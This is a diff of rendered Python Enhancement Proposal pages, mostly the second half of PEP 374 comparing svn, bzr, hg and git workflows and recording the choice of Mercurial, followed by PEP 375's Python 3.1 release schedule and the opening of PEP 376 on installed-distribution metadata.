As a core developer, I want to undo a change that was not ready for +inclusion in the mainline.

+
    +
  • Back out the unwanted change.
  • +
  • Push patch to server.
  • +
+
+

svn

+
# Assume the change to revert is in revision 40
+svn merge -c -40 .
+# Resolve conflicts, if any.
+svn commit -m "Reverted revision 40"
+
+
+
+
+

bzr

+
# Assume the change to revert is in revision 40
+bzr merge -r 40..39
+# Resolve conflicts, if any.
+bzr commit -m "Reverted revision 40"
+
+
+

Note that if the change you want revert is the last one that was +made, you can just use bzr uncommit.

+
+
+

hg

+
# Assume the change to revert is in revision 9150dd9c6d30
+hg backout --merge -r 9150dd9c6d30
+# Resolve conflicts, if any.
+hg commit -m "Reverted changeset 9150dd9c6d30"
+hg push
+
+
+

Note, you can use “hg rollback” and “hg strip” to revert changes you committed +in your local repository, but did not yet push to other repositories.

+
+
+

git

+
# Assume the change to revert is the grandfather of a revision tagged "newhotness".
+git revert newhotness~2
+# Resolve conflicts if any.  If there are no conflicts, the commit
+# will be done automatically by "git revert", which prompts for a log.
+git commit -m "Reverted changeset 9150dd9c6d30."
+git push
+
+
+
+
+
+

Patch Review

+

As a core developer, I want to review patches submitted by other +people, so that I can make sure that only approved changes are added +to Python.

+

Core developers have to review patches as submitted by other people. +This requires applying the patch, testing it, and then tossing away +the changes. The assumption can be made that a core developer already +has a checkout/branch/clone of the trunk.

+
    +
  • Branch off of trunk.
  • +
  • Apply patch w/o any comments as generated by the patch submitter.
  • +
  • Push patch to server.
  • +
  • Delete now-useless branch.
  • +
+
+

svn

+

Subversion does not exactly fit into this development style very well +as there are no such thing as a “branch” as has been defined in this +PEP. Instead a developer either needs to create another checkout for +testing a patch or create a branch on the server. Up to this point, +core developers have not taken the “branch on the server” approach to +dealing with individual patches. For this scenario the assumption +will be the developer creates a local checkout of the trunk to work +with.:

+
cp -r trunk issue0000
+cd issue0000
+patch -p0 < __patch__
+# Review patch.
+svn commit -m "Some patch."
+cd ..
+rm -r issue0000
+
+
+

Another option is to only have a single checkout running at any one +time and use svn diff along with svn revert -R to store away +independent changes you may have made.

+
+
+

bzr

+
bzr branch trunk issueNNNN
+# Download `patch` bundle from Roundup
+bzr merge patch
+# Review patch
+bzr commit -m'Patch NNN by So N. So' --fixes python:NNNN
+bzr push bzr+ssh://me@code.python.org/trunk
+rm -rf ../issueNNNN
+
+
+

Alternatively, since you’re probably going to commit these changes to +the trunk, you could just do a checkout. That would give you a local +working tree while the branch (i.e. all revisions) would continue to +live on the server. This is similar to the svn model and might allow +you to more quickly review the patch. There’s no need for the push +in this case.:

+
bzr checkout trunk issueNNNN
+# Download `patch` bundle from Roundup
+bzr merge patch
+# Review patch
+bzr commit -m'Patch NNNN by So N. So' --fixes python:NNNN
+rm -rf ../issueNNNN
+
+
+
+
+

hg

+
hg clone trunk issue0000
+cd issue0000
+# If the patch was generated using hg export, the user name of the
+# submitter is automatically recorded. Otherwise,
+# use hg import --no-commit submitted.diff and commit with
+# hg commit -u "Firstname Lastname <email.address@example.com>"
+hg import submitted.diff
+# Review patch.
+hg push ssh://alexandre@code.python.org/hg/trunk/
+
+
+
+
+

git

+

We assume a patch created by git-format-patch. This is a Unix mbox +file containing one or more patches, each formatted as an RFC 2822 +message. git-am interprets each message as a commit as follows. The +author of the patch is taken from the From: header, the date from the +Date header. The commit log is created by concatenating the content +of the subject line, a blank line, and the message body up to the +start of the patch.:

+
cd trunk
+# Create a branch in case we don't like the patch.
+# This checkout takes zero time, since the workspace is left in
+# the same state as the master branch.
+git checkout -b patch-review
+# Download patch from bugs.python.org to submitted.patch.
+git am < submitted.patch
+# Review and approve patch.
+# Merge into master and push.
+git checkout master
+git merge patch-review
+git push
+
+
+
+
+
+

Backport

+

As a core developer, I want to apply a patch to 2.6, 2.7, 3.0, and 3.1 +so that I can fix a problem in all three versions.

+

Thanks to always having the cutting-edge and the latest release +version under development, Python currently has four branches being +worked on simultaneously. That makes it important for a change to +propagate easily through various branches.

+
+

svn

+

Because of Python’s use of svnmerge, changes start with the trunk +(2.7) and then get merged to the release version of 2.6. To get the +change into the 3.x series, the change is merged into 3.1, fixed up, +and then merged into 3.0 (2.7 -> 2.6; 2.7 -> 3.1 -> 3.0).

+

This is in contrast to a port-forward strategy where the patch would +have been added to 2.6 and then pulled forward into newer versions +(2.6 -> 2.7 -> 3.0 -> 3.1).

+
# Assume patch applied to 2.7 in revision 0000.
+cd release26-maint
+svnmerge merge -r 0000
+# Resolve merge conflicts and make sure patch works.
+svn commit -F svnmerge-commit-message.txt  # revision 0001.
+cd ../py3k
+svnmerge merge -r 0000
+# Same as for 2.6, except Misc/NEWS changes are reverted.
+svn revert Misc/NEWS
+svn commit -F svnmerge-commit-message.txt  # revision 0002.
+cd ../release30-maint
+svnmerge merge -r 0002
+svn commit -F svnmerge-commit-message.txt  # revision 0003.
+
+
+
+
+

bzr

+

Bazaar is pretty straightforward here, since it supports cherry +picking revisions manually. In the example below, we could have +given a revision id instead of a revision number, but that’s usually +not necessary. Martin Pool suggests “We’d generally recommend doing +the fix first in the oldest supported branch, and then merging it +forward to the later releases.”:

+
# Assume patch applied to 2.7 in revision 0000
+cd release26-maint
+bzr merge ../trunk -c 0000
+# Resolve conflicts and make sure patch works
+bzr commit -m 'Back port patch NNNN'
+bzr push bzr+ssh://me@code.python.org/trunk
+cd ../py3k
+bzr merge ../trunk -r 0000
+# Same as for 2.6 except Misc/NEWS changes are reverted
+bzr revert Misc/NEWS
+bzr commit -m 'Forward port patch NNNN'
+bzr push bzr+ssh://me@code.python.org/py3k
+
+
+
+
+

hg

+

Mercurial, like other DVCS, does not well support the current +workflow used by Python core developers to backport patches. Right +now, bug fixes are first applied to the development mainline +(i.e., trunk), then back-ported to the maintenance branches and +forward-ported, as necessary, to the py3k branch. This workflow +requires the ability to cherry-pick individual changes. Mercurial’s +transplant extension provides this ability. Here is an example of +the scenario using this workflow:

+
cd release26-maint
+# Assume patch applied to 2.7 in revision 0000
+hg transplant -s ../trunk 0000
+# Resolve conflicts, if any.
+cd ../py3k
+hg pull ../trunk
+hg merge
+hg revert Misc/NEWS
+hg commit -m "Merged trunk"
+hg push
+
+
+

In the above example, transplant acts much like the current svnmerge +command. When transplant is invoked without the revision, the command +launches an interactive loop useful for transplanting multiple +changes. Another useful feature is the –filter option which can be +used to modify changesets programmatically (e.g., it could be used +for removing changes to Misc/NEWS automatically).

+

Alternatively to the traditional workflow, we could avoid +transplanting changesets by committing bug fixes to the oldest +supported release, then merge these fixes upward to the more recent +branches.

+
cd release25-maint
+hg import fix_some_bug.diff
+# Review patch and run test suite. Revert if failure.
+hg push
+cd ../release26-maint
+hg pull ../release25-maint
+hg merge
+# Resolve conflicts, if any. Then, review patch and run test suite.
+hg commit -m "Merged patches from release25-maint."
+hg push
+cd ../trunk
+hg pull ../release26-maint
+hg merge
+# Resolve conflicts, if any, then review.
+hg commit -m "Merged patches from release26-maint."
+hg push
+
+
+

Although this approach makes the history non-linear and slightly +more difficult to follow, it encourages fixing bugs across all +supported releases. Furthermore, it scales better when there is many +changes to backport, because we do not need to seek the specific +revision IDs to merge.

+
+
+

git

+

In git I would have a workspace which contains all of +the relevant master repository branches. git cherry-pick doesn’t +work across repositories; you need to have the branches in the same +repository.

+
# Assume patch applied to 2.7 in revision release27~3 (4th patch back from tip).
+cd integration
+git checkout release26
+git cherry-pick release27~3
+# If there are conflicts, resolve them, and commit those changes.
+# git commit -a -m "Resolve conflicts."
+# Run test suite. If fixes are necessary, record as a separate commit.
+# git commit -a -m "Fix code causing test failures."
+git checkout master
+git cherry-pick release27~3
+# Do any conflict resolution and test failure fixups.
+# Revert Misc/NEWS changes.
+git checkout HEAD^ -- Misc/NEWS
+git commit -m 'Revert cherry-picked Misc/NEWS changes.' Misc/NEWS
+# Push both ports.
+git push release26 master
+
+
+

If you are regularly merging (rather than cherry-picking) from a +given branch, then you can block a given commit from being +accidentally merged in the future by merging, then reverting it. +This does not prevent a cherry-pick from pulling in the unwanted +patch, and this technique requires blocking everything that you don’t +want merged. I’m not sure if this differs from svn on this point.

+
cd trunk
+# Merge in the alpha tested code.
+git merge experimental-branch
+# We don't want the 3rd-to-last commit from the experimental-branch,
+# and we don't want it to ever be merged.
+# The notation "^N" means Nth parent of the current commit. Thus HEAD^2^1^1
+# means the first parent of the first parent of the second parent of HEAD.
+git revert HEAD^2^1^1
+# Propagate the merge and the prohibition to the public repository.
+git push
+
+
+
+
+
+

Coordinated Development of a New Feature

+

Sometimes core developers end up working on a major feature with +several developers. As a core developer, I want to be able to +publish feature branches to a common public location so that I can +collaborate with other developers.

+

This requires creating a branch on a server that other developers +can access. All of the DVCSs support creating new repositories on +hosts where the developer is already able to commit, with +appropriate configuration of the repository host. This is +similar in concept to the existing sandbox in svn, although details +of repository initialization may differ.

+

For non-core developers, there are various more-or-less public-access +repository-hosting services. +Bazaar has +Launchpad, +Mercurial has +bitbucket.org, +and git has +GitHub. +All also have easy-to-use +CGI interfaces for developers who maintain their own servers.

+
    +
  • Branch trunk.
  • +
  • Pull from branch on the server.
  • +
  • Pull from trunk.
  • +
  • Push merge to trunk.
  • +
+
+

svn

+
# Create branch.
+svn copy svn+ssh://pythondev@svn.python.org/python/trunk svn+ssh://pythondev@svn.python.org/python/branches/NewHotness
+svn checkout svn+ssh://pythondev@svn.python.org/python/branches/NewHotness
+cd NewHotness
+svnmerge init
+svn commit -m "Initialize svnmerge."
+# Pull in changes from other developers.
+svn update
+# Pull in trunk and merge to the branch.
+svnmerge merge
+svn commit -F svnmerge-commit-message.txt
+
+
+

This scenario is incomplete as the decision for what DVCS to go with +was made before the work was complete.

+
+
+
+

Separation of Issue Dependencies

+

Sometimes, while working on an issue, it becomes apparent that the +problem being worked on is actually a compound issue of various +smaller issues. Being able to take the current work and then begin +working on a separate issue is very helpful to separate out issues +into individual units of work instead of compounding them into a +single, large unit.

+
    +
  • Create a branch A (e.g. urllib has a bug).
  • +
  • Edit some code.
  • +
  • Create a new branch B that branch A depends on (e.g. the urllib +bug exposes a socket bug).
  • +
  • Edit some code in branch B.
  • +
  • Commit branch B.
  • +
  • Edit some code in branch A.
  • +
  • Commit branch A.
  • +
  • Clean up.
  • +
+
+

svn

+

To make up for svn’s lack of cheap branching, it has a changelist +option to associate a file with a single changelist. This is not as +powerful as being able to associate at the commit level. There is +also no way to express dependencies between changelists.

+
cp -r trunk issue0000
+cd issue0000
+# Edit some code.
+echo "The cake is a lie!" > README
+svn changelist A README
+# Edit some other code.
+echo "I own Python!" > LICENSE
+svn changelist B LICENSE
+svn ci -m "Tell it how it is." --changelist B
+# Edit changelist A some more.
+svn ci -m "Speak the truth." --changelist A
+cd ..
+rm -rf issue0000
+
+
+
+
+

bzr

+

Here’s an approach that uses bzr shelf (now a standard part of bzr) +to squirrel away some changes temporarily while you take a detour to +fix the socket bugs.

+
bzr branch trunk bug-0000
+cd bug-0000
+# Edit some code. Dang, we need to fix the socket module.
+bzr shelve --all
+# Edit some code.
+bzr commit -m "Socket module fixes"
+# Detour over, now resume fixing urllib
+bzr unshelve
+# Edit some code
+
+
+

Another approach uses the loom plugin. Looms can +greatly simplify working on dependent branches because they +automatically take care of the stacking dependencies for you. +Imagine looms as a stack of dependent branches (called “threads” in +loom parlance), with easy ways to move up and down the stack of +threads, merge changes up the stack to descendant threads, create +diffs between threads, etc. Occasionally, you may need or want to +export your loom threads into separate branches, either for review +or commit. Higher threads incorporate all the changes in the lower +threads, automatically.

+
bzr branch trunk bug-0000
+cd bug-0000
+bzr loomify --base trunk
+bzr create-thread fix-urllib
+# Edit some code. Dang, we need to fix the socket module first.
+bzr commit -m "Checkpointing my work so far"
+bzr down-thread
+bzr create-thread fix-socket
+# Edit some code
+bzr commit -m "Socket module fixes"
+bzr up-thread
+# Manually resolve conflicts if necessary
+bzr commit -m 'Merge in socket fixes'
+# Edit me some more code
+bzr commit -m "Now that socket is fixed, complete the urllib fixes"
+bzr record done
+
+
+

For bonus points, let’s say someone else fixes the socket module in +exactly the same way you just did. Perhaps this person even grabbed your +fix-socket thread and applied just that to the trunk. You’d like to +be able to merge their changes into your loom and delete your +now-redundant fix-socket thread.

+
bzr down-thread trunk
+# Get all new revisions to the trunk. If you've done things
+# correctly, this will succeed without conflict.
+bzr pull
+bzr up-thread
+# See? The fix-socket thread is now identical to the trunk
+bzr commit -m 'Merge in trunk changes'
+bzr diff -r thread: | wc -l # returns 0
+bzr combine-thread
+bzr up-thread
+# Resolve any conflicts
+bzr commit -m 'Merge trunk'
+# Now our top-thread has an up-to-date trunk and just the urllib fix.
+
+
+
+
+

hg

+

One approach is to use the shelve extension; this extension is not included +with Mercurial, but it is easy to install. With shelve, you can select changes +to put temporarily aside.

+
hg clone trunk issue0000
+cd issue0000
+# Edit some code (e.g. urllib).
+hg shelve
+# Select changes to put aside
+# Edit some other code (e.g. socket).
+hg commit
+hg unshelve
+# Complete initial fix.
+hg commit
+cd ../trunk
+hg pull ../issue0000
+hg merge
+hg commit
+rm -rf ../issue0000
+
+
+

Several other way to approach this scenario with Mercurial. Alexander Solovyov +presented a few alternative approaches on Mercurial’s mailing list.

+
+
+

git

+
cd trunk
+# Edit some code in urllib.
+# Discover a bug in socket, want to fix that first.
+# So save away our current work.
+git stash
+# Edit some code, commit some changes.
+git commit -a -m "Completed fix of socket."
+# Restore the in-progress work on urllib.
+git stash apply
+# Edit me some more code, commit some more fixes.
+git commit -a -m "Complete urllib fixes."
+# And push both patches to the public repository.
+git push
+
+
+

Bonus points: suppose you took your time, and someone else fixes +socket in the same way you just did, and landed that in the trunk. In +that case, your push will fail because your branch is not up-to-date. +If the fix was a one-liner, there’s a very good chance that it’s +exactly the same, character for character. git would notice that, +and you are done; git will silently merge them.

+

Suppose we’re not so lucky:

+
# Update your branch.
+git pull git://code.python.org/public/trunk master
+
+# git has fetched all the necessary data, but reports that the
+# merge failed.  We discover the nearly-duplicated patch.
+# Neither our version of the master branch nor the workspace has
+# been touched.  Revert our socket patch and pull again:
+git revert HEAD^
+git pull git://code.python.org/public/trunk master
+
+
+

Like Bazaar and Mercurial, git has extensions to manage stacks of +patches. You can use the original Quilt by Andrew Morton, or there is +StGit (“stacked git”) which integrates patch-tracking for large sets +of patches into the VCS in a way similar to Mercurial Queues or Bazaar +looms.

+
+
+
+

Doing a Python Release

+

How does PEP 101 change when using a DVCS?

+
+

bzr

+

It will change, but not substantially so. When doing the +maintenance branch, we’ll just push to the new location instead of +doing an svn cp. Tags are totally different, since in svn they are +directory copies, but in bzr (and I’m guessing hg), they are just +symbolic names for revisions on a particular branch. The release.py +script will have to change to use bzr commands instead. It’s +possible that because DVCS (in particular, bzr) does cherry picking +and merging well enough that we’ll be able to create the maint +branches sooner. It would be a useful exercise to try to do a +release off the bzr/hg mirrors.

+
+
+

hg

+

Clearly, details specific to Subversion in PEP 101 and in the +release script will need to be updated. In particular, release +tagging and maintenance branches creation process will have to be +modified to use Mercurial’s features; this will simplify and +streamline certain aspects of the release process. For example, +tagging and re-tagging a release will become a trivial operation +since a tag, in Mercurial, is simply a symbolic name for a given +revision.

+
+
+

git

+

It will change, but not substantially so. When doing the +maintenance branch, we’ll just git push to the new location instead +of doing an svn cp. Tags are totally different, since in svn they +are directory copies, but in git they are just symbolic names for +revisions, as are branches. (The difference between a tag and a +branch is that tags refer to a particular commit, and will never +change unless you use git tag -f to force them to move. The +checked-out branch, on the other hand, is automatically updated by +git commit.) The release.py script will have to change to use git +commands instead. With git I would create a (local) maintenance +branch as soon as the release engineer is chosen. Then I’d “git +pull” until I didn’t like a patch, when it would be “git pull; git +revert ugly-patch”, until it started to look like the sensible thing +is to fork off, and start doing “git cherry-pick” on the good +patches.

+
+
+
+
+

Platform/Tool Support

+
+

Operating Systems

+ + + + + + + + + + + + + + + + + + + + + + + + + +
DVCSWindowsOS XUNIX
bzryes (installer) w/ tortoiseyes (installer, fink or MacPorts)yes (various package formats)
hgyes (third-party installer) w/ tortoiseyes (third-party installer, fink or MacPorts)yes (various package formats)
gityes (third-party installer)yes (third-party installer, fink or MacPorts)yes (.deb or .rpm)
+

As the above table shows, all three DVCSs are available on all three +major OS platforms. But what it also shows is that Bazaar is the +only DVCS that directly supports Windows with a binary installer +while Mercurial and git require you to rely on a third-party for +binaries. Both bzr and hg have a tortoise version while git does not.

+

Bazaar and Mercurial also has the benefit of being available in pure +Python with optional extensions available for performance.

+
+
+

CRLF -> LF Support

+
+
bzr
My understanding is that support for this is being worked on as +I type, landing in a version RSN. I will try to dig up details.
+
hg
Supported via the win32text extension.
+
git
I can’t say from personal experience, but it looks like there’s +pretty good support via the core.autocrlf and core.safecrlf +configuration attributes.
+
+
+
+

Case-insensitive filesystem support

+
+
bzr
Should be OK. I share branches between Linux and OS X all the +time. I’ve done case changes (e.g. bzr mv Mailman mailman) and +as long as I did it on Linux (obviously), when I pulled in the +changes on OS X everything was hunky dory.
+
hg
Mercurial uses a case safe repository mechanism and detects case +folding collisions.
+
git
Since OS X preserves case, you can do case changes there too. +git does not have a problem with renames in either direction. +However, case-insensitive filesystem support is usually taken +to mean complaining about collisions on case-sensitive files +systems. git does not do that.
+
+
+
+

Tools

+

In terms of code review tools such as Review Board and Rietveld, +the former supports all three while the latter supports hg and git but +not bzr. Bazaar does not yet have an online review board, but it +has several ways to manage email based reviews and trunk merging. +There’s Bundle Buggy, Patch Queue Manager (PQM), and +Launchpad’s code reviews.

+

All three have some web site online that provides basic hosting +support for people who want to put a repository online. Bazaar has +Launchpad, Mercurial has bitbucket.org, and git has GitHub. Google +Code also has instructions on how to use git with the service, both +to hold a repository and how to act as a read-only mirror.

+

All three also appear to be supported +by Buildbot.

+
+
+
+

Usage On Top Of Subversion

+ + + + + + + + + + + + + + + + + +
DVCSsvn support
bzrbzr-svn (third-party)
hgmultiple third-parties
gitgit-svn
+

All three DVCSs have svn support, although git is the only one to +come with that support out-of-the-box.

+
+
+

Server Support

+ + + + + + + + + + + + + + + + + +
DVCSWeb page interface
bzrloggerhead
hghgweb
gitgitweb
+

All three DVCSs support various hooks on the client and server side +for e.g. pre/post-commit verifications.

+
+
+

Development

+

All three projects are under active development. Git seems to be on a +monthly release schedule. Bazaar is on a time-released monthly +schedule. Mercurial is on a 4-month, timed release schedule.

+
+
+

Special Features

+
+

bzr

+

Martin Pool adds: “bzr has a stable Python scripting interface, with +a distinction between public and private interfaces and a +deprecation window for APIs that are changing. Some plugins are +listed in https://edge.launchpad.net/bazaar and +http://bazaar-vcs.org/Documentation”.

+
+
+

hg

+

Alexander Solovyov comments:

+
+
Mercurial has easy to use extensive API with hooks for main events +and ability to extend commands. Also there is the mq (mercurial +queues) extension, distributed with Mercurial, which simplifies +work with patches.
+
+
+

git

+

git has a cvsserver mode, ie, you can check out a tree from git +using CVS. You can even commit to the tree, but features like +merging are absent, and branches are handled as CVS modules, which +is likely to shock a veteran CVS user.

+
+
+
+

Tests/Impressions

+

As I (Brett Cannon) am left with the task of making the final +decision of which/any DVCS to go with and not my co-authors, I felt +it only fair to write down what tests I ran and my impressions as I +evaluate the various tools so as to be as transparent as possible.

+
+

Barrier to Entry

+

The amount of time and effort it takes to get a checkout of Python’s +repository is critical. If the difficulty or time is too great then a +person wishing to contribute to Python may very well give up. That +cannot be allowed to happen.

+

I measured the checking out of the 2.x trunk as if I was a non-core +developer. Timings were done using the time command in zsh and +space was calculated with du -c -h.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
DVCSSan FranciscoVancouverSpace
svn1:042:59139 M
bzr10:4516:04276 M
hg2:305:24171 M
git2:545:28134 M
+

When comparing these numbers to svn, it is important to realize that +it is not a 1:1 comparison. Svn does not pull down the entire revision +history like all of the DVCSs do. That means svn can perform an +initial checkout much faster than the DVCS purely based on the fact +that it has less information to download for the network.

+
+
+

Performance of basic information functionality

+

To see how the tools did for performing a command that required +querying the history, the log for the README file was timed.

+ + + + + + + + + + + + + + + + + +
DVCSTime
bzr4.5 s
hg1.1 s
git1.5 s
+

One thing of note during this test was that git took longer than the +other three tools to figure out how to get the log without it using a +pager. While the pager use is a nice touch in general, not having it +automatically turn on took some time (turns out the main git +command has a --no-pager flag to disable use of the pager).

+
+
+

Figuring out what command to use from built-in help

+

I ended up trying to find out what the command was to see what URL the +repository was cloned from. To do this I used nothing more than the +help provided by the tool itself or its man pages.

+

Bzr was the easiest: bzr info. Running bzr help didn’t show +what I wanted, but mentioned bzr help commands. That list had the +command with a description that made sense.

+

Git was the second easiest. The command git help didn’t show much +and did not have a way of listing all commands. That is when I viewed +the man page. Reading through the various commands I discovered git +remote. The command itself spit out nothing more than origin. +Trying git remote origin said it was an error and printed out the +command usage. That is when I noticed git remote show. Running +git remote show origin gave me the information I wanted.

+

For hg, I never found the information I wanted on my own. It turns out +I wanted hg paths, but that was not obvious from the description +of “show definition of symbolic path names” as printed by hg help +(it should be noted that reporting this in the PEP did lead to the +Mercurial developers to clarify the wording to make the use of the +hg paths command clearer).

+
+
+

Updating a checkout

+

To see how long it takes to update an outdated repository I timed both +updating a repository 700 commits behind and 50 commits behind (three +weeks stale and 1 week stale, respectively).

+ + + + + + + + + + + + + + + + + + + + + +
DVCS700 commits50 commits
bzr39 s7 s
hg17 s3 s
gitN/A4 s
+
+

Note

+

Git lacks a value for the 700 commits scenario as it does +not seem to allow checking out a repository at a specific +revision.

+
+

Git deserves special mention for its output from git pull. It +not only lists the delta change information for each file but also +color-codes the information.

+
+
+
+

Decision

+

At PyCon 2009 the decision was made to go with Mercurial.

+
+

Why Mercurial over Subversion

+

While svn has served the development team well, it needs to be +admitted that svn does not serve the needs of non-committers as well +as a DVCS does. Because svn only provides its features such as version +control, branching, etc. to people with commit privileges on the +repository it can be a hindrance for people who lack commit +privileges. But DVCSs have no such limitation as anyone can create a +local branch of Python and perform their own local commits without the +burden that comes with cloning the entire svn repository. Allowing +anyone to have the same workflow as the core developers was the key +reason to switch from svn to hg.

+

Orthogonal to the benefits of allowing anyone to easily commit locally +to their own branches is offline, fast operations. Because hg stores +all data locally there is no need to send requests to a server +remotely and instead work off of the local disk. This improves +response times tremendously. It also allows for offline usage for when +one lacks an Internet connection. But this benefit is minor and +considered simply a side-effect benefit instead of a driving factor +for switching off of Subversion.

+
+
+

Why Mercurial over other DVCSs

+

Git was not chosen for three key reasons (see the PyCon 2009 +lightning talk where Brett +Cannon lists these exact reasons; talk started at 3:45). First, git’s +Windows support is the weakest out of the three DVCSs being considered +which is unacceptable as Python needs to support development on any +platform it runs on. Since Python runs on Windows and some people do +develop on the platform it needs solid support. And while git’s +support is improving, as of this moment it is the weakest by a large +enough margin to warrant considering it a problem.

+

Second, and just as important as the first issue, is that the Python +core developers liked git the least out of the three DVCS options by a +wide margin. If you look at the following table you will see the +results of a survey taken of the core developers and how by a large +margin git is the least favorite version control system.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
DVCS++equalUninformed
git51813
bzr103212
hg151110
+

Lastly, all things being equal (which they are not +as shown by the previous two issues), it is preferable to +use and support a tool written in Python and not one written in C and +shell. We are pragmatic enough to not choose a tool simply because it +is written in Python, but we do see the usefulness in promoting tools +that do use it when it is reasonable to do so as it is in this case.

+

As for why Mercurial was chosen over Bazaar, it came down to +popularity. As the core developer survey shows, hg was preferred over +bzr. But the community also appears to prefer hg as was shown at PyCon +after git’s removal from consideration was announced. Many people came +up to Brett and said in various ways that they wanted hg to be chosen. +While no one said they did not want bzr chosen, no one said they did +either.

+

Based on all of this information, Guido and Brett decided Mercurial +was to be the next version control system for Python.

+
+
+
+

Transition Plan

+

PEP 385 outlines the transition from svn to hg.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0374.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0375/index.html b/pep-0375/index.html new file mode 100644 index 00000000000..a643be95c93 --- /dev/null +++ b/pep-0375/index.html @@ -0,0 +1,221 @@ + + + + + + + + PEP 375 – Python 3.1 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 375 – Python 3.1 Release Schedule

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
08-Feb-2009
+
Python-Version:
+
3.1
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for Python 3.1. +The schedule primarily concerns itself with PEP-sized items. Small features may +be added up to and including the first beta release. Bugs may be fixed until +the final release.

+
+
+

Release Manager and Crew

+ + + + + + + + + + + + + + + + + +
PositionName
3.1 Release ManagerBenjamin Peterson
Windows installersMartin v. Loewis
Mac installersRonald Oussoren
+
+
+

Release Schedule

+
    +
  • 3.1a1 March 7, 2009
  • +
  • 3.1a2 April 4, 2009
  • +
  • 3.1b1 May 6, 2009
  • +
  • 3.1rc1 May 30, 2009
  • +
  • 3.1rc2 June 13, 2009
  • +
  • 3.1 final June 27, 2009
  • +
+
+
+

Maintenance Releases

+

3.1 is no longer maintained. 3.1 received security fixes until June +2012.

+

Previous maintenance releases are:

+
    +
  • v3.1.1rc1 2009-08-13
  • +
  • v3.1.1 2009-08-16
  • +
  • v3.1.2rc1 2010-03-06
  • +
  • v3.1.2 2010-03-20
  • +
  • v3.1.3rc1 2010-11-13
  • +
  • v3.1.3 2010-11-27
  • +
  • v3.1.4rc1 2011-05-29
  • +
  • v3.1.4 2011-06-11
  • +
  • v3.1.5rc1 2012-02-23
  • +
  • v3.1.5rc2 2012-03-15
  • +
  • v3.1.5 2012-04-06
  • +
+
+
+

Features for 3.1

+
    +
  • importlib
  • +
  • io in C
  • +
  • Update simplejson to the latest external version [1].
  • +
  • Ordered dictionary for collections (PEP 372).
  • +
  • auto-numbered replacement fields in str.format() strings [2]
  • +
  • Nested with-statements in one with statement
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0375.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0376/index.html b/pep-0376/index.html new file mode 100644 index 00000000000..8c1387b8ac6 --- /dev/null +++ b/pep-0376/index.html @@ -0,0 +1,721 @@ + + + + + + + + PEP 376 – Database of Installed Python Distributions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 376 – Database of Installed Python Distributions

+
+
Author:
+
Tarek Ziadé <tarek at ziade.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
22-Feb-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+
22-Jun-2009
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

The goal of this PEP is to provide a standard infrastructure to manage +project distributions installed on a system, so all tools that are +installing or removing projects are interoperable.

+

To achieve this goal, the PEP proposes a new format to describe installed +distributions on a system. It also describes a reference implementation +for the standard library.

+

In the past an attempt was made to create an installation database +(see PEP 262).

+

Combined with PEP 345, the current proposal supersedes PEP 262.

+

Note: the implementation plan didn’t go as expected, so it should be +considered informative only for this PEP.

+
+
+

Rationale

+

There are two problems right now in the way distributions are installed in +Python:

+
    +
  • There are too many ways to do it and this makes interoperation difficult.
  • +
  • There is no API to get information on installed distributions.
  • +
+
+

How distributions are installed

+

Right now, when a distribution is installed in Python, every element can +be installed in a different directory.

+

For instance, Distutils installs the pure Python code in the purelib +directory, which is lib/python2.6/site-packages for unix-like systems and +Mac OS X, or Lib\site-packages under Python’s installation directory for +Windows.

+

Additionally, the install_egg_info subcommand of the Distutils install +command adds an .egg-info file for the project into the purelib +directory.

+

For example, for the docutils distribution, which contains one package an +extra module and executable scripts, three elements are installed in +site-packages:

+
    +
  • docutils: The docutils package.
  • +
  • roman.py: An extra module used by docutils.
  • +
  • docutils-0.5-py2.6.egg-info: A file containing the distribution metadata +as described in PEP 314. This file corresponds to the file +called PKG-INFO, built by the sdist command.
  • +
+

Some executable scripts, such as rst2html.py, are also added in the +bin directory of the Python installation.

+

Another project called setuptools [1] has two other formats +to install distributions, called EggFormats [4]:

+
    +
  • a self-contained .egg directory, that contains all the distribution files +and the distribution metadata in a file called PKG-INFO in a subdirectory +called EGG-INFO. setuptools creates other files in that directory that can +be considered as complementary metadata.
  • +
  • an .egg-info directory installed in site-packages, that contains the same +files EGG-INFO has in the .egg format.
  • +
+

The first format is automatically used when you install a distribution that +uses the setuptools.setup function in its setup.py file, instead of +the distutils.core.setup one.

+

setuptools also add a reference to the distribution into an +easy-install.pth file.

+

Last, the setuptools project provides an executable script called +easy_install [2] that installs all distributions, including +distutils-based ones in self-contained .egg directories.

+

If you want to have standalone .egg-info directories for your distributions, +e.g. the second setuptools format, you have to force it when you work +with a setuptools-based distribution or with the easy_install script. +You can force it by using the --single-version-externally-managed option +or the --root option. This will make the setuptools project install +the project like distutils does.

+

This option is used by :

+
    +
  • the pip [3] installer
  • +
  • the Fedora packagers [5].
  • +
  • the Debian packagers [6].
  • +
+
+
+

Uninstall information

+

Distutils doesn’t provide an uninstall command. If you want to uninstall +a distribution, you have to be a power user and remove the various elements +that were installed, and then look over the .pth file to clean them if +necessary.

+

And the process differs depending on the tools you have used to install the +distribution and if the distribution’s setup.py uses Distutils or +Setuptools.

+

